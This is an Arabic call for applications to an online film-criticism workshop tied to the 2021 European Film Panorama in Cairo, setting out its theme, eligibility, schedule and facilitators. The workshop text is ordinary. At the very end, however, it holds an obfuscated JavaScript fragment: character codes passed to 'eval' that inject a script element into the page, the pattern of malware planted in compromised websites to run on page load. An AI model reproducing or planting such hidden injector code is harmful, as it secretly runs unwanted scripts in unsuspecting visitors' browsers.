كيف نكتب عن شخصيات درامية نشعر تجاهها بالثقل، نتشارك معها بعض الصفات ولكن نرفض ما تطرحه تركيبتها الدرامية؟ إحدى الصعوبات التي تواجه الناقد السينمائي – أو الناقدة – خاصة المنتمي إلى موقع مهمش اجتماعيا وثقافيا هي ظهور شخصيات درامية تمثل جزء من هويته لكنها تعيد إنتاج نفس علاقات السلطة السائدة والتي تؤدي إلى التهميش في المقام الأول. إذا أراد الناقد أن يتفاعل مع هذه الشخصيات التي تظهر في الأفلام، كيف ولماذا يكتب عنها؟ هل يكتب/ تكتب كي يوضح/توضح الأساليب التي تعيد بها الثقافة السائدة إنتاج هيمنتها من خلال الأفلام أم يكتب نقدا يعيد فيه تصور وبناء التركيبة الدرامية لهذه الشخصيات، أم يكتب في محاولة للاستحواذ عليها وتجاوزها؟ ربما السؤال الأصعب هو كيف نكتب نصوصا نقدية تستخدم البلاغة كي تقوم بأفعال مثل: الاستحواذ، والتجاوز، والمحي وإعادة البناء للشخصيات؟
نبدأ الورشة من الإحساس بالثقل وما ينتج عنه من رفض وأحيانا رغبة في محو هذه الشخصيات الدرامية تماما من تاريخ السينما. تأتي الرغبة في المحو بعدد من التساؤلات فقد تكون هذه الشخصيات التي نرفضها هي التمثيلات الوحيدة «لنا» في السينما. لذلك نبدأ النقاشات من الإحساس بالثقل ولكن نكتشف معا طرقا لممارسة نقد سينمائي يخلق أيضا سرديات وخطابات و«ايقونات سينمائية» أخرى.
ندعوكم للتقدم إلى ورشة عمل نشرة البانوراما ٢٠٢١. الورشة مفتوحة للنقاد والكتاب والباحثين من مختلف الخلفيات والممارسين في مجالات السينما من القاهرة وخارجها حيث تعقد الورشة هذه الدورة أونلاين. تدعو الورشة من ٦ إلى ٧ مشاركين ومشاركات للعمل على تطوير مطبوعة تظهر في إطار بانوراما الفيلم الأوروبي المزمع عقده في يناير ٢٠٢١. على مدار جلسات الورشة سوف يقوم المشاركين بتطوير نص طوله من 1500 إلى 2000 كلمة يتعاطى مع السؤال الرئيس للورشة.
يُرحب بالنصوص التي تستخدم أدوات بلاغية مبتكرة وتجرب في أساليب متعددة لكتابة النقد السينمائي. اللقاء الأسبوعي فرصة لمقابلة كتاب آخرين ومشاركتهم مسودات من النصوص قيد التطوير والاطلاع على بعض القراءات المرتبطة بموضوع الورشة والعمل مع محررة على تحضير النصوص للنشر والعمل مع المصممة على الإخراج الفني للمطبوعة. كما تتيح الورشة فرصة لمشاهدة بعض الأفلام التي سوف تعُرض في إطار البانوراما إذا أراد المشارك أو المشاركة ضم واحد أو أكثر منها داخل إطار بحثه.
متوقع من المشاركين التقدم بفكرة مبدئية عن النص المرغوب تطويره والالتزام بحضور الجلسات الاسبوعية وبمراجعة مسودات الأخرين قبل الاجتماع. نسعى لخلق مناخ رحب لتطوير الأفكار ومشاركتها.
شروط التقديم:
الورشة مفتوحة للمشاركين من داخل وخارج القاهرة.
إجادة الكتابة والقراءة باللغة العربية والقدرة على القراءة باللغة الانجليزية.
لا يشترط أن يكون النص المطروح للتطوير داخل الورشة جديدا، تتيح الورشة المجال لتطوير نصوص موجودة.
لا يشترط خبرة سابقة في الكتابة.
تعقد الورشة أونلاين، أيام الاثنين من كل أسبوع من الساعة ٦ إلى ٩ مساء. تبدأ يوم الإثنين ٢٣ نوفمبر وتنتهي يوم٢١ ديسمبر ٢٠٢٠. إذا رغبتم في التقدم، يرجى لطفا ملء الاستمارة التالية في موعد أقصاه ١٧ نوفمبر ٢٠٢٠: https://forms.gle/b97vAoUPcGQqbMqKA
تقوم نور الصافوري بتيسير الورشة، وتقوم شهد الصباغ بتصميم المطبوعة النهائية. تعملان نور وشهد معا تحت اسم «عصمت» كي ينتجوا سلسلة من المطبوعات تأخذ من الشخصيات الدرامية والمشاعر التي تثيرها فينا مصدرا للإلهام. تظهر هذه المطبوعة بالتعاون مع بانوراما الفيلم الأوروبي وسينما زاوية ضمن سلسلة مطبوعات «عصمت».
بانوراما الفيلم الأوروبي هو مهرجان سنوي يعقد على مدار ١١ يوم، تعرض من خلاله أحدث الإنتاجات الأوروبية (الروائية والوثائقية) الحائزة على جوائز عالمية، بالإضافة إلى كلاسيكيات ومعالم من السينما الأوروبية. بدأت نشرة البانوراما كنتاج لورشة نقد سينمائي نظمتها ورش دهشور في ٢٠١٦ وكانت النشرة تظهر في شكل مطبوعات تقدم قراءة للأفلام التي يعرضها المهرجان.
107,39,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125);eval(t);